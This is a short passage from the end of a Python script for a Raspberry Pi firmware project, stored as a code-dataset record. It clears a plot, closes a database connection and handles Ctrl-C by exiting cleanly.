plt.clf()\n\n        cnx.close()\n        #loop = input('Enter a number:')\n\n# sys and os are used by the interrupt handler below but were missing from the\n# imports at the top of the file.\nimport sys\nimport os\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except KeyboardInterrupt:\n        print('Interrupted')\n        try:\n            sys.exit(0)\n        except SystemExit:\n            os._exit(0)\n","sub_path":"Firmware/n_code_rasp.py","file_name":"n_code_rasp.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}